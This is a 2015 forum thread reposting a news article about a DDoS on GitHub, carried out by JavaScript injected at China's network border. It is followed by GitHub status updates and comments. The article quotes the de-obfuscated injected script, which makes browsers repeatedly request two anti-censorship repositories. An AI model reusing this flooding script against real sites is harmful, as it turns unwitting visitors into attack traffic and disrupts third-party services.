Reefa Posted March 27, 2015 Share Posted March 27, 2015 GitHub's servers are being hammered by web traffic from an army of unwitting cyber-foot-soldiers. It appears when thousands of people visit websites that serve ads and tracking code from Baidu – China's answer to Google – from outside the Middle Kingdom, network gateways on the Chinese border silently inject a JavaScript function into those websites' pages.This simple code instructs browsers to stealthily connect to GitHub.com every two seconds, creating "an extremely large amount of traffic," the San Francisco-based upstart said.The JS specifically targets two GitHub-hosted projects – Greatfire and CN-NYTimes – which help Chinese citizens circumvent The Great Firewall Of China. The firewall blocks things like VPNs and censors web traffic, hiding information on the Tiananmen Square massacre and so on.GitHub said on Friday that the bursts in traffic, effectively a string of distributed denial-of-service attacks, are causing intermittent outages."We're aware that GitHub.com is intermittently unavailable for some users during the ongoing DDoS," GitHub said in a status update at 1549 UTC today."Restoring service for all users while deflecting attack traffic is our number one priority. We've deployed our volumetric attack defenses against an extremely large amount of traffic. Performance is stabilizing."Hours earlier, the biz noted: "We've been under continuous DDoS attack for 24+ hours. The attack is evolving, and we're all hands on deck mitigating."The outage ... GitHub's status updates today According to a security researcher at Insight Labs, HTTP requests to hm.baidu.com/h.js are being hijacked by China's border gateways, which insert some semi-obfuscated JavaScript to attack the aforementioned GitHub repositories. The injected script looks like this, once unscrambled:document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[\x3c/script>");!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime = (new Date).getTime();var count = 0;function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];NUM = url_array.length;function r_send2() { var a = unixtime() % NUM; get(url_array[a])}function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } })}function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3);The Greatfire project provides links to cloud-hosted mirrors of websites – such as the BBC and Google's Blogger – that Chinese people can use to dodge the Great Firewall. While BBC.com is blocked, a cache of the broadcaster's pages on cloudfront.net is not, it seems. CN-NYTimes similarly mirrors the New York Times."A certain device at the border of China's inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load [the GitHub pages] every two seconds," Insight Labs' Anthr@x wrote."In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech."While there is no proof that the Chinese government was directly involved in the assault, other researchers, such as F-Secure's Mikko Hypponen, noted that someone, state or otherwise, wants these projects silenced.http://www.theregister.co.uk/2015/03/27/github_under_fire_from_weaponized_great_firewall/ Link to comment Share on other sites More sharing options...
knowledge-Spammer Posted March 28, 2015 Share Posted March 28, 2015 nice bit of code but not nice people Link to comment Share on other sites More sharing options...
Joe13 Posted March 28, 2015 Share Posted March 28, 2015 https://status.github.com/2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match. Link to comment Share on other sites More sharing options...
Reefa Posted March 28, 2015 Author Share Posted March 28, 2015 https://status.github.com/2:30 UTC The ongoing DDoS attack has shifted to include Pages and assets. We are updating our defenses to match.Cheers for the update on the story mate. ;) Link to comment Share on other sites More sharing options...
Joe13 Posted March 28, 2015 Share Posted March 28, 2015 Large Scale DDoS Attack on github.comjnewlandWe are currently experiencing the largest DDoS (distributed denial of service) attack in github.com's history. The attack began around 2AM UTC on Thursday, March 26, and involves a wide combination of attack vectors. These include every vector we've seen in previous attacks as well as some sophisticated new techniques that use the web browsers of unsuspecting, uninvolved people to flood github.com with high levels of traffic. Based on reports we've received, we believe the intent of this attack is to convince us to remove a specific class of content.We are completely focused on mitigating this attack. Our top priority is making sure github.com is available to all our users while deflecting malicious traffic. Please watch our status site or follow @githubstatus on Twitter for real-time updates. Link to comment Share on other sites More sharing options...
Joe13 Posted March 29, 2015 Share Posted March 29, 2015 10:53 UTC Services are stable as we continue to mitigate against a large scale DDoS attack. Link to comment Share on other sites More sharing options...
Joe13 Posted March 29, 2015 Share Posted March 29, 2015 19:25 UTC We've adjusted our mitigation tactics and are observing improved TCP performance for the majority of non-attack traffic. Link to comment Share on other sites More sharing options...
CODYQX4 Posted March 30, 2015 Share Posted March 30, 2015 The code is actually very simple, and JavaScript 101 person could write something of similar function.Just a loop via setTimeout to suck down the URL via Web Request.The real alarming this here, is if you pull and code at all from China, you are vulnerable to their Government tampering with it. I'm sure most nations have this capability, but this is confirmed fact that the Chinese government uses us as DDOS pawns.Good thing I use stuff like uBlock, no crappy ad injection code from any country in my browser. Link to comment Share on other sites More sharing options...
Joe13 Posted March 30, 2015 Share Posted March 30, 2015 Today 6:46 UTC The DDoS attack has evolved and we are working to mitigate. 0:38 UTC All systems reporting at 100%. Attack traffic continues, so we remain on high alert. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.